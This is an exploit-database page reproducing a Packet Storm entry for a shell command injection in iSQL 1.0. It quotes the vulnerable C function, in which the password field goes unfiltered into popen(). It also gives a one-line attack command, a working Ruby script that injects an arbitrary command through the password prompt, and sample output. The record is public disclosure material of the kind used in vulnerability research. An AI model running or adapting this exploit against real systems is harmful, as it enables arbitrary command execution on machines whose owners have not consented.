Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormHaHwulPACKETSTORM:137436
HistoryJun 13, 2016 - 12:00 a.m.

iSQL 1.0 Shell Command Injection

2016-06-1300:00:00
HaHwul
packetstormsecurity.com
29
JSON
`#!/bin/ruby  
# Exploit Title: iSQL(RL) 1.0 - Shell Command Injection  
# Date: 2016-06-13  
# Exploit Author: HaHwul  
# Exploit Author Blog: www.hahwul.com  
# Vendor Homepage: https://github.com/roselone/iSQL  
# Software Link: https://github.com/roselone/iSQL/archive/master.zip  
# Version: 1.0  
# Tested on: Debian [wheezy]  
# CVE : none  
  
  
=begin  
### Vulnerability Point  
:: [isql_main.c 455 line] popen(cmd,"r"); code is vulnerable  
:: don't filtering special characters in str value  
446 char *get_MD5(char *str){  
447 FILE *stream;  
448 char *buf=malloc(sizeof(char)*33);  
449 char cmd[100];  
450 memset(buf,'\0',sizeof(buf));  
451 memset(cmd,'\0',sizeof(cmd));  
452 strcpy(cmd,"echo "); //5  
453 strcpy((char *)cmd+5,str);  
454 strcpy((char *)cmd+5+strlen(str)," | md5sum");  
455 stream=popen(cmd,"r");  
456 fread(buf,sizeof(char),32,stream);  
457 // printf("%s\n",buf);  
458 return buf;  
459 }  
  
### Vulnerability Triger  
614 while (USER_NUM==-1){  
615 printf(">username:");  
616 scanf("%s",username);  
617 printf(">password:");  
618 scanf("%s",passwd);  
619 md5=get_MD5(passwd);  
  
### Vulnerability Run  
>username:asdf;   
>password:asdf;top;echo 1  
  
(~) #> ps -aux | grep top  
root 13279 0.0 0.0 4472 860 pts/1 S+ 13:33 0:00 sh -c echo asdf;top;echo | md5sum  
root 13280 0.3 0.0 26304 3200 pts/1 S+ 13:33 0:00 top  
  
=end   
  
### Attack command  
#> (sleep 5; echo -en 'aasdf\n';sleep 1;echo -en 'asdf;nc;echo 1';sleep 10) | ./isql  
  
### Ruby Code  
puts "SQL 1.0 - Shell Command Injection"  
puts "by hahwul"  
if(ARGV.size != 1)  
puts "Usage: ruby iSQL_command_injection.rb [COMMAND]"  
puts " need ./isql in same directory"  
exit()  
else   
puts "CMD :: "+ARGV[0]  
puts "Run Injection.."  
system("(sleep 5; echo -en 'aasdf\n';sleep 1;echo -en 'asdf;#{ARGV[0]};echo 1';sleep 10) | ./isql")  
end  
  
### Sample Output  
=begin  
#> ruby test.rb nc  
# Exploit Title: iSQL 1.0 Shell Command Injection  
by hahwul  
CMD :: nc  
Run Injection..  
  
*************** welcome to ISQL ****************  
* version 1.0 *  
* Designed by RL *  
* Copyright (c) 2011, RL. All rights reserved *  
************************************************  
  
>username:>password:verify failure , try again !  
This is nc from the netcat-openbsd package. An alternative nc is available  
in the netcat-traditional package.  
usage: nc [-46bCDdhjklnrStUuvZz] [-I length] [-i interval] [-O length]  
[-P proxy_username] [-p source_port] [-q seconds] [-s source]  
[-T toskeyword] [-V rtable] [-w timeout] [-X proxy_protocol]  
[-x proxy_address[:port]] [destination] [port]  
>username:>password:verify failure , try again !  
^Ctest.rb:10:in `system': Interrupt  
from test.rb:10:in `<main>'  
=end  
  
  
  
  
  
  
  
`
JSON